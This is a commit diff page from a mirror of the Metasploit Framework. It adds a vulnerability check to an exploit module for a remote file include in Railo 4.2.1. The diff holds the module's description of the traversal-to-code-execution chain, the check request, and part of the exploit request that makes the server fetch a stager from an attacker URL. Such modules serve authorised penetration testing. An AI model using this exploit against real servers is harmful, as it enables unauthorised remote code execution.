infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add check method

bug/bundler_fix
Brandon Perry 2014-09-02 21:35:47 -05:00
parent 438f0e6365
commit ee3e5c9159
1 changed files with 11 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
modules/exploits/linux/http/railo_cfml_rfi.rb
View File

@ -17,10 +17,10 @@ class Metasploit4 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a remote file include vulnerability in Railo,
tested against version 4.2.1. First, a call using a vulnerable
<cffile> line in thumbnail.cfm allows an attacker to download an
arbitrary PNG file. By appending a .cfm and taking advantage of
<cffile> line in thumbnail.cfm allows an atacker to download an
arbitrary PNG file. By appending a .cfm, and taking advantage of
a directory traversal, an attacker can append cold fusion markup
to the PNG file and have it interpreted by the server. This is
to the PNG file, and have it interpreted by the server. This is
used to stage and execute a fully-fledged payload.
},
'License' => MSF_LICENSE,
@ -63,6 +63,13 @@ class Metasploit4 < Msf::Exploit::Remote
end
def check
res = send_request_cgi({
'url' => normalize_uri(target_uri.path, 'res', 'css', 'admin42.css.cfm')
})
return Exploit::CheckCode::Appears if res and res.code == 200
return Exploit::CheckCode::Safe
end
def exploit
@ -92,7 +99,7 @@ class Metasploit4 < Msf::Exploit::Remote
wh = '5000' #width and height
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path + '/admin/thumbnail.cfm'),
'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
'vars_get' => {
'img' => url + '/' + stager_name,
'height' => wh,